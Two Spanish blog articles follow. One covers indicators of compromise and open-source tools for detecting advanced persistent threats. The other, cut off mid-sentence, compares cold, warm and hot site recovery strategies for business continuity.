https://ciberseguridad.blog/indicadores-de-deteccion-apt-advanced-persistent-threat/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-03-16 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Las organizaciones necesitan monitorizando sus redes continuamente, saber qué buscar y obtener indicadores, es fundamental para buscar un APT. ¡ CONÓCELOS ! En un mundo donde las organizaciones necesitan estar observando o monitorizando sus redes continuamente, saber qué buscar es fundamental. En este post trataremos de discutir cómo detectar incidentes de manera temprana al identificar "precursores de ataques" y otros indicadores principales que ayudarán a proteger nuestra organización y pueden detener un ataque. [Vídeo](https://www.youtube.com/watch?v=CynPHFDOwAc) ## Tipos de amenazas de ataque Existen varias fuentes de actores amenazantes, por ejemplo: - Molestos - Los ataques son oportunistas La organización está dirigida porque es vulnerable - Insider - La información privilegiada de confianza roba datos Difícil de prevenir pero la detección y atribución es posible - Hacktivistas - Motivado por una causa Determinado pero no siempre sofisticado - Propiedad financiera e intelectual (PI) - Ataques más sofisticados Típicamente, información de destino para ganancia financiera o competitiva - Patrocinado por el estado - Persistente y dirigido Los ataques continúan hasta que se obtienen datos específicos ## Anatomía de un ataque Con suficiente tiempo y recursos, un atacante experto siempre encontrará una manera de entrar. Entonces, ¿cómo lidian las empresas con esto? Las empresas deben tener un Programa de Respuesta a Incidentes (IRP) en su lugar. Se requiere un IRP exitoso para juntar los recursos necesarios de una manera organizada para detectar y enfrentar un evento adverso relacionado con la seguridad del personal, los sistemas y los datos. Un IRP debe analizarse exhaustivamente para evaluar la respuesta de una organización a los incidentes que ocurren en su entorno. La mayoría de las organizaciones no están preparadas para detectar y responder a intrusiones específicas, la mayoría de las veces porque ... - Las defensas tradicionales no funcionan - Visión enfocada en vulnerabilidades y prevención de Zero Days - Procesos de respuesta a incidentes insuficientemente desarrollados - Compromiso de los recursos humanos con las habilidades necesarias, la capacitación y la preparación Las organizaciones necesitan una nueva estrategia de defensa en profundidad, " Defense-in-Depth + ", diseñada y desplegada como una postura de seguridad defendible que permite la capacidad de ... - Detectar - Contiene - Investigar - Erradicar - Recuperar Ningún producto o productos por si solo puede detener a los atacantes humanos innovadores que pueden evolucionar a medida que surge la necesidad, alterando las tácticas y desarrollando niveles cada vez mayores de sofisticación. ## Indicadores de compromiso En el entorno de amenazas actual, la comunicación rápida de la información de amenazas es la clave para detectar, responder y contener rápidamente ataques dirigidos. La búsqueda de indicadores de compromiso (IOC) es una forma efectiva de combatir a los atacantes avanzados. Los IOC son artefactos forenses de una intrusión que se pueden identificar en un host o red. Los IOC vinculados a “observables” se relacionan con eventos cuantificables o propiedades con estado que pueden representar desde la creación de una clave de registro en un host (evento medible) hasta la presencia de un mutex (propiedad con estado). Por ejemplo, después de usar el Framework de Detección APT para optimizar y verificar cualquier brecha, una organización debe monitorear y detectar continuamente cosas como: - Tráfico de red saliente inusual - Actividad geográfica o de campo a través de inicios de sesión inusuales o patrones de acceso - Intentos de ocultar u pistas u oscurecen su presencia en sus sistemas - Señales de envenenamiento de caché ARP, suplantación de ARP y otros ataques de hombre en el medio - Cambios sospechosos en los puertos de escucha, los servicios del sistema y los controladores, las tareas de inicio y las tareas programadas - Anomalías en la actividad de la cuenta de usuario privilegiado o cambios de permisos - Cambios en las configuraciones locales de Firewall y cuentas de usuario locales - Cambios en los servidores DNS o el enrutamiento de IP - Síntomas o presencia de rootkits Todos estos elementos pueden proporcionar indicios tempranos de malos actores y ayudarlo a identificar y contener incidentes de seguridad antes de que resulten en pérdida para el negocio. Aunque no están presentes en todos los escenarios de respuesta a incidentes, los IOC están presentes con mayor frecuencia si el analista de seguridad tiene los ciclos y la oportunidad de aprender dónde y cómo identificarlos. La capacidad de un analista de seguridad, que trabaje en el CSIRT o investigador / cazador de amenazas para recopilar, registrar y anotar IOC de manera detallada es un factor de éxito crítico. [Imagen: Proceso de búsqueda de indicadores de compromiso] La fórmula de alto nivel en la búsqueda de indicadores de compromiso es: **Detección ** - Herramientas y metodología del atacante del documento (también conocido como inteligencia) Red DNS, IP y patrones de protocolo de tráfico (de salida) Entradas del archivo de registro Alojar artefactos forenses y memoria viva Metadatos Analiza las herramientas del atacante para crear IOC altamente efectivas - Usa la inteligencia para buscar proactivamente actividad de atacante Contención * Cuarentena en la red * Realizar una Respuesta ante Incidentes en vivo para identificar lo que sucedió y su actividad relacionada Investigar * Investigar incidentes para aumentar el compromiso de inteligencia y alcance * Llevar a cabo sesiones de escenarios de amenazas basadas en la inteligencia recolectada Erradicar y recuperar - Identificar todo Cuentas y servidores comprometidos (usuario, servicio, todos AD, etc.) Puertas traseras activas (balizas) y pasivas (escuchas) Otros puntos de entrada como servidores web, VPN y servicios de terminal - Debemos : Restablecer contraseñas Eliminar puertas traseras Separar los sistemas vulnerables que están explotando para poder acceder - Continuar buscando IOCs para garantizar que la reparación funcionó e identificar si el atacante regresa - Llevar a cabo las lecciones aprendidas y las sesiones post mortem Limpiar y repetir Los indicadores comienzan simplemente buscando firmas específicas. Estos pueden ser los artefactos forenses tradicionales como las sumas de comprobación MD5, los tiempos de compilación, el tamaño del archivo, el nombre, la ubicación de las rutas, las claves de registro, etc. Se pueden combinar muchos tipos diferentes de indicadores específicos en una IOC, de modo que cualquiera de varios conjuntos de firmas de diferentes tipos de complejidad podría aplicarse dentro de una IOC particular. [Imagen: Framework de detección de amenazas] Los casos de uso simple permiten consultar artefactos forenses como: - Buscar un archivo específico por MD5 sum (hash), nombre de archivo, tamaño, fecha de creación u otros atributos de archivo - Buscando una entidad específica en la memoria (información de proceso, ejecución de información de servicio) - Buscando una entrada específica o un conjunto de entradas en el Registro de Windows - Combinando estos en varias combinaciones para proporcionar una mejor coincidencia y menos falsos positivos que las búsquedas de artefactos individuales. Al igual que muchas prácticas de seguridad, la autoría del IOC es un arte. Practíca con una mentalidad creativa. En definitiva, los mejores IOC tienen estas propiedades: - El IOC identifica solo la actividad del atacante - El IOC es de bajo costo para evaluar, por lo general es simple y evalúa la información que es menos costosa de recopilar o calcular - El IOC es costoso para que el atacante se evada. En otras palabras, para evadir el IOC, el atacante tiene que cambiar drásticamente las tácticas, las herramientas o el enfoque. También hay varios estándares emergentes para lo que anteriormente ha sido un enfoque ad-hoc en el peor y organizacional en el mejor de los casos para desarrollar IOCs. Estudiaremos más adelante los estándares emergentes y la I + D realizada por CyBox (cybox.mitre.org), OpenIOC (openioc.org) e IODEF ( IETF RFC 5070), donde los puntos clave son: - Aceptar que los atacantes maniobrarán más allá de sus defensas - Contratar o entrenar personas para buscar IOC e investigar alertas es imprescindible - Tenemos que invertir en tecnologías para apoyar a dichas personas - Si esto no es una competencia central, debemos asociarnos con un proveedor de servicios de seguridad de confianza. Las Amenazas Persistentes Avanzadas (APT) típicamente exhiben atributos y patrones reconocibles que pueden ser monitorizadas por herramientas de código abierto fácilmente disponibles. Estas herramientas pueden permitir la detección temprana del comportamiento de APT, especialmente al monitorizar el tráfico inusual entre zonas o tráfico de salida. Si bien no existe una solución milagrosa en la lucha contra los ataques dirigidos, un marco holístico que incluya una variada metodología y herramientas, al tiempo que adopta tácticas defensivas en capas, puede ser muy útil. ## Monitorizar para detectar el comportamiento de APT Monitorizar una combinación de datos de red y datos de integridad de archivos del host puede ser clave para detectar APT. Una combinación de herramientas de código abierto, como Snort, Splunk, Sguil y Squert, son especialmente adecuadas para monitorizar los patrones de actividad en los datos a lo largo del tiempo para ver un posible ataque. Los vectores de ataque cambian constantemente y le corresponde al equipo de seguridad mantenerse al tanto de las condiciones que pueden justificar cambios en la estrategia APT o buscar asociarse para adquirir experiencia y la mejor práctica de ayuda. ### La firma APT del Malware - El malware de APT se esconde a plena vista Evita la detección mediante el uso de puertos de red comunes, inyección de procesos y persistencia del servicio de Windows El malware APT inicia las conexiones de red salientes Debes controlar el tráfico de red saliente Identifica los intentos de balizamiento de salida de APT - Evita la detección de anomalías a través de : Conexiones HTTP salientes Inyección de procesos Persistencia del servicio - Comunicación APT El 100% de las puertas traseras APT solo hicieron conexiones salientes El 83% usó el puerto TCP 80 o 443, muchos usuarios de Proxy Las firmas simples de malware, como los hash MD5, los nombres de archivo y los métodos antivirus tradicionales, generalmente producen una baja tasa de verdaderos positivos [Imagen: Momento clave de infección] Los factores asociados con los ataques APT incluyen lo siguiente: - Incrementos repentinos en el tráfico de red, transferencias salientes. - Patrones de actividad inusuales, como grandes transferencias de datos fuera del horario normal de oficina o en ubicaciones inusuales - Consultas repetidas a nombres DNS dinámicos - Búsquedas inusuales de directorios y archivos de interés para un atacante, por ejemplo, búsquedas en repositorios de código fuente - Archivos de salida grandes no reconocidos que se han comprimido, cifrados y protegidos con contraseña - Detección de comunicaciones hacia / desde direcciones IP falsas - Accesos externos que no utilizan proxys locales o solicitudes que contienen llamadas API - Cambios inexplicables en las configuraciones de plataformas, enrutadores o firewalls - Mayor volumen de eventos / alertas de IDS ### Herramientas de detección y análisis APT Una APT depende del control y acceso remoto, como tal, la actividad de red asociada con el control remoto se puede identificar, contener e interrumpir a través del análisis del tráfico de red entre zonas y de salida. Las técnicas para la detección de APT se pueden implementar a través de herramientas de software de código abierto y se pueden usar para implementar metodologías, tales como: - Snort : Un sistema de prevención y detección de intrusiones basado en red de fuente abierta (IDS / IPS) desarrollado originalmente por Martin Roesch. Snort emplea firmas y protocolos, así como inspección basada en anomalías - Scapy : Un programa de manipulación de paquetes. Scapy puede crear paquetes para una amplia gama de protocolos. Puede enviar y recibir paquetes y hacer coincidir solicitudes y respuestas. Es extensible a través de scripts de Python y se puede utilizar para una variedad de medidas de detección - OSSEC : Un IDS de código abierto basado en el host, a diferencia de Snort. Su motor de correlación y análisis proporciona análisis de registro, comprobación de integridad de archivos, supervisión de registro de Windows, detección de rootkits y alertas basadas en tiempo, así como respuesta activa, y puede admitir la mayoría de los sistemas operativos. - Splunk : Una herramienta de búsqueda, monitorización e informes que integra registros y otros datos de aplicaciones, servidores y dispositivos de red. El repositorio de datos está indexado y puede consultarse para crear gráficos, informes y alertas - Sguil : Incluye una GUI intuitiva que proporciona acceso a eventos en tiempo real, datos de sesión y capturas de paquetes sin formato. Sguil facilita la práctica de la supervisión de la seguridad de la red y el análisis impulsado por eventos - Squert : Una aplicación web utilizada para consultar y visualizar datos de eventos almacenados en una base de datos Sguil. Mediante el uso de metadatos, representaciones de series temporales, conjuntos de resultados ponderados y agrupados lógicamente, proporciona un contexto adicional a los eventos Estas herramientas se ajustan a la categoría general de monitorización de seguridad de red ( NSM ), como se describe en varios libros de Richard Bejtlich, como " La práctica de monitorización de seguridad de red , comprender la detección y la respuesta ante incidentes ". La detección de intrusiones (IDS) por sí sola no es óptima y las organizaciones necesitan una combinación de herramientas como NSM para tratar con varios tipos de datos. Sguil es la implementación de facto de NSM. - Security Onion : Security Onion (SO) es una distribución de Linux para la detección de intrusos, monitorización de seguridad de red y administración de registros. Está basado en Ubuntu y contiene Snort, Suricata, Bro, Sguil, Squert, Snorby, ELSA, Xplico, NetworkMiner y muchas otras herramientas de seguridad. El asistente de instalación fácil de usar permite a las organizaciones crear en cuestión de minutos un proyecto de sensores distribuidos por la organización. Security Onion está configurado como uso inmediato por defecto. Idealmente, debe instalarse en hardware dedicado, pero tambien puede implementar a través de máquinas virtuales. El primer paso para mejorar SO para una funcionalidad de correlación óptima es agregar Splunk. ## Conclusión Es vital practicar una conciencia operacional elevada en torno a datos y activos críticos, por ejemplo, datos confidenciales, código fuente y propiedad intelectual. Debemos segmentar y ajustar los datos críticos en zonas seguras administradas dentro de la protección más profunda de infraestructura defendible bien monitorizada con flujos de red (NetFlow) y herramientas de registro para aumentar la visibilidad y habilitar la captura de paquetes bajo demanda. Es imposible proteger todo por igual. Los esfuerzos incrementales, dirigidos a proteger datos de alto valor, generalmente a través de segmentos de red más pequeños y protegidos proporcionan ganancias mucho mayores que los esfuerzos más amplios y menos enfocados en objetivos de menor valor. De forma similar, las tácticas defensivas en capas (capas múltiples y medios de defensa) pueden contener infracciones de seguridad y ganar tiempo para detectar y responder a un ataque, reduciendo las consecuencias de un ataque. Se trata de comenzar con un Back to Basics: Arquitectura defendible que está bien organizada y administrada según la clasificación de activos y datos y la evaluación de riesgos que definen las políticas, la ubicación y los controles. > Debemos enfocarnos en detectar, contener, investigar, responder, erradicar, recuperar Incluso la mejor mentalidad y metodología de monitorización puede no garantizar el descubrimiento de un ataque real de APT. En su lugar, debemos utilizar un análisis y una correlación más completa para descubrir comportamientos indicativos de ataques relacionados con APT, movimientos laterales y exfiltración de datos. --- # Estrategias de recuperación para un plan de continuidad del negocio URL: https://ciberseguridad.blog/estrategias-de-recuperacion-para-un-plan-de-continuidad-del-negocio/ Tipo: Artículo Autor: Juan Pablo Lamela Pascua Publicado: 2018-03-12 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Un plan de continuidad del negocio es el proceso de crear sistemas de prevención y recuperación antes las posibles amenazas de una organización. ¡CONOCELOS! Cuanto más cortos son el RTO y el RPO , más complejos y caros son los planes de continuidad de negocio. Estos dos parámetros son además los que deciden la estrategia de recuperación a seguir. RTO (Recovery Time Objetive) : El objetivo de tiempo de recuperación (RTO) es la duración específica del tiempo y un nivel de servicio dentro del cual debe restaurarse un proceso comercial después de un desastre (o interrupción) para evitar consecuencias inaceptables asociadas con una interrupción en la continuidad del negocio. Puede incluir el tiempo para intentar solucionar el problema sin una recuperación, la recuperación en sí misma, las pruebas y la comunicación a los usuarios. El RTO y los resultados del BIA en su totalidad proporcionan la base para identificar y analizar estrategias viables para su inclusión en el plan de continuidad del negocio. Las opciones de estrategia viables incluirían cualquiera que permita la reanudación de un proceso comercial en un marco de tiempo en o cerca del RTO. Esto incluiría procedimientos de solución alternativa o manual y no requeriría necesariamente que los sistemas informáticos cumplan con los RTO. RPO (Recovery Point Objetive) : El objetivo del punto de recuperación (RPO) se define mediante la planificación de la continuidad del negocio. Es el período objetivo máximo en el que se pueden perder datos de un servicio de TI debido a un incidente importante. El RPO le da a los diseñadores de sistemas un límite para trabajar. Por ejemplo, si el RPO está configurado en cuatro horas, entonces, en la práctica, las copias de seguridad duplicadas fuera del sitio deben mantenerse continuamente, una copia de seguridad diaria fuera del sitio en cinta no sería suficiente. [Vídeo](https://www.youtube.com/watch?v=h7DdkUuqvY8) El estudio incluye las siguientes perspectivas: - Punto de vista económico - Punto de vista del tiempo de recuperación e indisponibilidad del sistema - Punto de vista de definición y estimación de parámetros como el RPO y RTO - Punto de vista de dependencia con el incidente del centro principal: el principal problema es el activo información en forma de datos - Punto de vista de procedimientos y procesos - Punto de vista de pruebas Centrándonos en la principal estrategia para un plan de continuidad de negocio que suele ser disponer de un centro de procesos de datos o CPD alternativo o de respaldo, podemos tener los siguientes escenarios o estrategias: ## Acuerdos entre partes Dos o más empresas acuerdan proveerse mutuamente de instalaciones en caso de emergencia. Se reservan espacios y, en caso de desastre, sólo se necesita transportar los equipos y conectarlos a la red de la empresa “receptora". ### Ventajas Desde el punto de vista económico, es la estrategia de menor coste de todas. Incluso, dependiendo si el acuerdo establece que la reserva de espacio es gratuita, puede incluso que el coste asociado a las instalaciones sea cero. Para cierto tipo de incidencias, el tiempo de recuperación puede ser menor y de menor complejidad. Por ejemplo, para una incidencia en el equipamiento auxiliar como corte en el suministro eléctrico o corte en las comunicaciones, al mover los equipos del entorno de producción al DRS, éstos arrancarán con la misma configuración e información que el CPD principal, por lo que los trabajos de puesta en marcha de los servicios serán más sencillos. Igualmente, los trabajos de configuración son menores cuando se devuelven los equipos al centro principal. Los procedimientos y procesos definidos en el plan de continuidad harán referencia a los equipos del sitio principal, por lo que los técnicos y operadores estarán más habituados ## Inconvenientes Esta estrategia es dependiente de la degradación de los activos del sistema principal, y puede darse el caso que no se pueda dar servicio desde el sitio de respaldo. Por ejemplo, si no se da servicio por avería de un servidor, ese servidor tampoco dará servicio en el centro de respaldo. Igualmente, es necesario ser consciente que no es una estrategia válida en caso de degradación de los datos: los datos estarán igual de degradados si se accede a ellos desde el sitio principal como desde el de emergencia. Adicionalmente, habrá incidentes de los que no se conozca el impacto en los activos hasta que se intente que den servicio desde el sitio de respaldo. Por ejemplo, ante un corte de suministro eléctrico de larga duración en el que se decida mover los equipos al sitio de referencia, puede darse el caso que al iniciar algún equipo nos demos cuenta que el corte eléctrico incluía un pico de tensión que haya afectado al equipo y haya que cambiar piezas o directamente haya sido destruido. Por tanto, esta estrategia lleva asociada una incertidumbre de si se podrá dar servicio desde el sitio de respaldo, por lo que sólo es válida para riesgos asociados a ciertos tipos de amenazas con bajo impacto de los activos. Además, se crea una dependencia de los servicios críticos en terceros: con esta estrategia se crea una dependencia de los servicios e información esencial de la organización en terceras partes. Se confía en la diligencia y buenas prácticas de la otra organización. Esta estrategia también lleva asociada una imposibilidad de realizar pruebas controladas para verificar los procedimientos que componen el plan de continuidad de negocio: al tener que trasladar equipos del entorno de producción, probar el PCN implica interrupción del servicio en el CPD principal. Una vez levantados los servicios en el DRS, se estará dando servicio, no son pruebas controladas (a no ser que se consideren como tales y luego se deseche la información producida). Lo que era una ventaja al trasladar los equipos de producción, puede transformarse en un problema logístico dependiendo de la hora del incidente y el tamaño de los equipos: si el incidente que implica moverse al DRS es, por ejemplo el peor caso, en fin de semana y por la noche, el RTO definido debe tener en cuenta los tiempos asociados a la compañía de transporte y el personal que se necesita. Por ejemplo, un servidor frontend se traslada rápido, una cabina de almacenamiento puede ser más difícil. De la misma manera que el inconveniente anterior, hay que hacer un estudio previo que las instalaciones prestadas cumplan todos los requisitos de los equipos de producción que se moverán (requerimientos eléctricos, topología de rack, peso máximo soportado por el suelo, pasillos de acceso libres, etc). Para servicios publicados en Internet, teniendo en cuenta que la organización prestadora querrá seguir utilizando su direccionamiento público, es necesario realizar cambios asociados al DNS, y éstos deben propagarse hasta los clientes: si se utilizan las comunicaciones de Internet de otra organización, habrá que cambiar la ip pública de los servicios de Internet, lo que implica cambios de configuración en los DNS desde el punto de vista interno (configuración de los equipos y configuración de los servidores DNS públicos si se tienen) y/o externos (gestor de dominios). Los cambios deben propagarse a los clientes, es decir, que todos los clientes se den cuenta de las nuevas ips públicas de los servicios de la organización. Debe incluirse en el acuerdo de instalaciones la reserva de las ips públicas para los servicios esenciales que se muevan al DRS. Aunque se hayan publicitado previamente las ips de respaldo, es de esperar que haya clientes que no las tengan correctamente configuradas (desconocimiento, bloqueo de firewalls, etc). También hay que tener en cuenta los problemas asociados con la vuelta a la operación desde el centro de respaldo. Así, mientras se esté operando en el centro de respaldo, los activos no se pueden devolver al sitio principal, por lo que volverá a haber indisponibilidad de servicio mientras se vuelve al centro principal. Además, estos activos esenciales no habrán participado en las pruebas de verificación y recuperación del centro principal, por lo que vuelve a introducirse un riesgo e incertidumbre que se reflejará en un mayor tiempo de recuperación. Esta estrategia también lleva asociada una menor eficiencia referida al personal de la organización, lo que puede traducirse en una menor eficiencia operacional: todo el personal que se traslade a la otra organización no estará acostumbrado a operar y resolver los problemas desde el nuevo sitio, por lo que al final los procesos normales se retrasarán. De la misma forma, si el acuerdo no incluye la organización de jornadas de “comunicación”, la comunicación real entre las personas de las dos organizaciones será un problema, por ejemplo, que los técnicos encargados de levantar el sitio de emergencia no conozcan a las personas responsables de guiarles en las instalaciones de respaldo. También es fácil que se dé un conflicto de intereses entre las dos organizaciones que puede no estar recogido en el acuerdo. Por ejemplo, que la organización visitante ocupe demasiado ancho de banda y los procesos de la organización prestadora se vean afectados. De la mima forma, la organización prestadora no sólo puede ver afectados sus procesos desde el punto de vista técnico, sino también desde el punto de vista de personal, ya que habrá tendrá que asignar recursos humanos a atender a la organización visitante. Finalmente, y como conclusión, un posible un paso intermedio entre esta modalidad y el cold site, sería disponer de un centro de respaldo propio con las instalaciones básicas en un centro independiente, para eliminar la dependencia con una tercera empresa. El principal impacto sería en lo económico al tener que contratar la segunda ubicación ## Estrategia Cold Site Segunda ubicación, identificada y contratada previamente, para que en caso de necesidad la organización pueda desplazar a ella la ejecución de algunos o todos los procesos. Esta segunda ubicación contendrá únicamente las instalaciones básicas. Si se opta por una solución de cold site, se deberá tener en cuenta que comporta la adquisición de los nuevos equipos y su configuración, el traslado de la información (y del personal, si es el caso) como pasos previos a levantar el servicio y trabajar con los nuevos equipos en la nueva ubicación. Para realizar el estudio, consideramos como definición de coldsite la anterior, es decir, que se dispone de las instalaciones básicas y que se utilizan equipos nuevos, nunca los equipos del sitio principal. ## Ventajas Desde el punto de vista económico, el gasto mensual es sólo el de mantenimiento de las instalaciones básicas. Al tratarse de equipos nuevos, no habrán sufrido ninguna degradación asociada al incidente que haya requerido operar desde el sitio de respaldo No existe una dependencia con terceros y los problemas asociados comentados en la estrategia anterior. En cuanto a servicios publicados en Internet, es más fácil contratar una línea de comunicaciones permanente en el sitio de respaldo y publicitar y probar el acceso de los clientes a las ips de respaldo. Incluso se puede contratar con el IPS que se opere con las direcciones ip habituales desde el sitio de emergencia. La vuelta al sitio principal es más eficiente que en la anterior estrategia. El tiempo de parada es igual al tiempo que se tarda en parar el sitio principal más el tiempo que se tarda en arrancar el sitio principal. Incluso se podrían hacer en paralelo muchos de los procesos y estar definido el tiempo de indisponibilidad solamente como el tiempo en que se tarda en mover los datos/activos de información. Además, para preparar la vuelta al sitio principal, este modelo permite hacer pruebas y verificaciones en el sitio principal mientras se opera en el sitio de respaldo. Adicionalmente, si estamos en un contexto en que los datos no son necesarios o se puede generar datos desde cero, se reduce el tiempo de parada ya que no hay que preocuparse de cómo se para el sitio de respaldo, sólo hay que preocuparse cómo se levanta el sitio principal. Por tanto, esta estrategia podría ser adecuada en entornos donde los activos de información no son necesarios migrar al sitio de respaldo. ## Inconvenientes Desde el punto de vista económico, cuando se necesite y haya que comprar nuevo equipamiento, el desembolso de una sola vez puede ser importante y la cantidad debe estar disponible y ser asumible por la organización. La adquisición de nuevos equipos implica tiempos de envío, que deberán sumarse a la definición del RTO y el RPO. Además puede haber problemas con la disponibilidad de los nuevos equipos, desde que el equipo que se necesite no esté en stock en ningún vendedor hasta que directamente ya no se fabrique y esté indisponible. En este caso habría que buscar alternativas que deberían haber sido ya evaluadas en el plan de continuidad de negocio. Por tanto, si se sigue esta estrategia, el plan de continuidad de negocio debe tener información actualizada de qué equipos se comprarían y dónde. Todos los equipos nuevos hay que configurarlos, por lo que ese tiempo también aumenta el RTO y el RPO. Esta estrategia también puede considerarse dependiente del incidente en cuanto a la degradación de activos de información: si los datos hay que moverlos al sitio de respaldo se llevarán su degradación producida por el incidente. Si los datos no son necesarios y se puede operar con datos nuevos o desde cero, entonces esta estrategia no es dependiente del impacto de los activos en el sitio principal. Otro inconveniente a tener en cuenta es la imposibilidad de realizar pruebas controladas. Ya que no se disponen de equipos hasta el incidente, no se pueden probar. Por tanto, el plan de continuidad sólo definirá estimaciones, ningún parámetro podrá ser probado y documentado. Lo mismo ocurre con los procedimientos definidos en el plan de continuidad de negocio: estarán definidos para el equipamiento del sitio principal, y habrá que modificarlos en tiempo real para el sitio de respaldo. Además se introduce un nuevo componente tras la vuelta al sitio principal: ¿Qué se hace con los nuevos equipos adquiridos? ¿Cómo se amortizan? Por tanto hay que decidir si después del incidente la organización opta por un modelo de warm site. ## Estrategia Warm Site Segunda ubicación, identificada y contratada previamente, y de los equipos (al menos de parte de ellos) considerados como los más importantes para la realización de este proceso. Además, los equipos de que se disponga en esta segunda ubicación deberán estar parcialmente configurados para que en el momento de la contingencia no se tenga que partir de cero. Los warm sites están destinados, principalmente, a la recuperación de procesos que pueden estar un tiempo, generalmente breve, inactivos. ### Ventajas Respecto a las estrategias anteriores, el warmsite introduce un elemento fundamental: poder realizar pruebas controladas en el sitio de respaldo. Al estar disponible permanentemente, el plan de continuidad de negocio podrá incluir pruebas programadas, que además servirán para actualizar y refinar las configuraciones. Además, todos los procesos y procedimientos del plan de continuidad de negocio podrán ser probados y la documentación hará referencia a los equipos que se utilizarán en un caso real. Los aspectos anteriores hacen que se reduzca considerablemente el RTO. Además de pruebas internas que sirvan de entrenamiento al personal de la organización, y al disponer normalmente de comunicaciones propias, también se pueden organizar pruebas donde participen los clientes, lo que mejorará la operativa cuando se opere en real en el sitio de respaldo en situación de emergencia. Por tanto, un warmsite da la posibilidad no sólo de probar los aspectos técnicos, sino también de probar los procesos de negocio de la organización en caso de incidente Desde el punto de vista económico, se trata de una estrategia más económica que la estrategia hotsite. La principal diferencia entre los dos es el tratamiento de los datos: si se dispone de un centro warmsite habrá que hacer un volcado de datos ya sea del último backup o de lo que se recupere del centro principal, mientras que en un centro hotsite habrá que levantar la copia remota de los datos. Al disponer de equipos propios instalados en el centro de respaldo, estos no se habrán visto degradados por el incidente del sitio principal, por lo que la confianza de poder operar en emergencia cuando se produzcan ciertos incidentes de impacto importante será mayor. La única degradación que puede afectar es, otra vez, la relativa a los datos, lo que marcará el RPO. En cuanto a la vuelta al centro de respaldo, también permite las pruebas de restauración en el sitio principal mientras se opera desde el centro de respaldo. ### Inconvenientes Frente a las estrategias anteriores, el impacto económico es mayor y empieza a ser importante, ya que un warmsite incluye gastos mensuales y la compra, mantenimiento y renovación de equipos en paralelo a los del sitio principal. Desde el punto de vista técnico, como ya se ha comentado, el principal problema es que el RPO lo marca la degradación de los datos. Habrá incidencias que impidan hacer una copia en tiempo real de los datos necesarios para operar en real ya sea porque no es posible debido a la degradación o porque el tiempo de realizar la copia y la restauración es demasiado alto, por lo que en esos casos habrá que utilizar la última copia de seguridad disponible. De la misma manera, el RTO vendrá en muchas veces marcado por el tiempo de restauración de la copia de respaldo. Desde el punto de vista de procedimientos y procesos, el plan de continuidad de negocio tiene que ser continuamente actualizado con la información de las últimas pruebas, lo que supone gasto de recursos humanos y de tiempo Cualquier cambio de funcionalidad en el sitio principal implica un proceso de evaluación de cómo afectará al sitio de respaldo y cómo debe funcionar en el sitio de respaldo, lo que implica desarrollos más largos y complejos, en definitiva, más costosos. Así, las puestas en producción de nuevas versiones de aplicativo y, en definitiva, cualquier cambio de configuración en el sitio principal, tiene que ser replicados en el sitio de respaldo, y, mientras no se realicen nuevas pruebas para verificar los cambios en el sitio de respaldo, habrá un periodo de incertidumbre de si el warmsite está correctamente configurado, lo que se traduce en un aumento del RTO en caso de incidente. ## Estrategia Hot Suite Esta estrategia es, desde el punto de vista de la seguridad, la mejor de todas al minimiza el tiempo de inactividad de un proceso pero, a su vez, es la que requiere una mayor inversión. Comporta disponer de todos los equipos actualizados y configurados para poder utilizarlos de forma automática o en pocas horas. También necesitará disponer de personal con conocimientos y documentación ajustada y que refleje la situación real de la organización. Por su elevado coste, esta estrategia está destinada a procesos muy críticos que no pueden estar inactivos mucho tiempo, por lo que, generalmente, no se puede realizar el volcado de la información en el momento de la contingencia. En este sentido, se puede optar por uno de los dos sistemas siguientes: - Volcado sincronizado: cualquier modificación que se realice en la información que se utiliza en producción se lleva a cabo de forma instantánea en el segundo centro, con lo que ello comporta en cuanto al ancho de banda y los equipos necesarios. - Volcado asíncrono: los centros se configuran para que de forma periódica, y como mucho a lo largo de 24 horas, se realice un volcado total de la información en producción al centro alternativo. De esta forma, en caso de desastre, se dispondrá de la información de como máximo hace un día, y en muchas organizaciones es suficiente para poder levantar el proceso. ### Ventajas Disponer de un hotsite resuelve la gran amenaza sobre una organización: la degradación de los activos de información en forma de datos. Ya sea mediante copia síncrona o copia asíncrona, el sitio de respaldo dispone de una copia de los datos que lo normal es que sea completamente operativa en caso que se necesite. De esta manera, el RPO vendrá marcado por el procedimiento de copia. El plan de continuidad de negocio debe incluir todos los procedimientos y procesos para que los servicios esenciales se operen y den servicio desde el centro de respaldo y con los datos fijados en el RPO. Por tanto, como ya dispone de una copia de los datos, el RTO será el más bajo de todas las estrategias y también el de menor RPO. También permite la realización de pruebas internas y pruebas con clientes, pero añade dos nuevos aspectos claves: - Por un lado la funcionalidad de flashcopy: Las cabinas de almacenamiento actuales permiten realizar copias de los datos sin parar la sincronización de los sitios y que están disponibles en el momento sin necesidad de completar la copia. De esta manera se pueden hacer pruebas sin tener que esperar a completar los procesos de restauración o copia, y sin parar la sincronización de los sitios y desechando el flashcopy utilizado al finalizar las pruebas. - Por otro lado, el plan de continuidad de negocio puede incluir operación en real desde el sitio de respaldo de forma controlada. Así, se puede planificar la operación en real desde el sitio de respaldo con la participación de los clientes y que sirva como entrenamiento a todas las partes interesadas. En cuanto a la vuelta al sitio principal, también permite pruebas de recuperación del sitio principal, y además el RPO y RTO de vuelta es menor: simplemente hay que dar la vuelta al sentido de la copia de los datos . ### Inconvenientes Desde el punto de vista económico, es la estrategia más cara porque hay que disponer de un sistema de copia síncrona o asíncrona de los datos entre sitios, además de todos los equipos críticos que también habrá que actualizarlos en paralelo a los equipos de producción. Se puede utilizar la estrategia de llevar los equipos antiguos al centro de respaldo cuando se renuevan los del sitio principal, pero como suele tratarse de servicios críticos para la organización, lo normal es que se renueven todos los equipos a la vez. Además, los sistemas de copia entre sitio suelen requerir equipos de similares generaciones y capacidades, luego el gasto aumenta. Igual que en el warmsite, también hay que tener en cuenta el sitio de respaldo para todos los cambios de configuración, y la necesidad de probar y verificar dichos cambios en el sitio de respaldo es todavía más crítica. El trabajo de mantener actualizado un hotsite es importante en cuanto a dedicación de recursos humanos y de tiempo y todo el equipo de TI debe ser consciente de la necesidad de mantener el hotsite actualizado. Además toda la organización debe ser consciente de la necesidad de mantener y probar el sitio de respaldo. Debido a que la tecnología es más compleja, el personal de la organización requiere mayor cualificación técnica, lo que traduce en mayor dedicación y mayor gasto. Es muy habitual que el tratamiento de la copia remota se contrate su gestión a terceros especializados, lo que implica más gastos. Además es muy dependiente de la rotación de los empleados: hay que dedicar formación específica a los nuevos empleados y se perderá experiencia en el centro de respaldo con las salidas de los empleados. El plan de continuidad de negocio debe incluir pruebas periódicas en el centro de respaldo, e incluso operación en real controlada porque si no el centro de respaldo corre 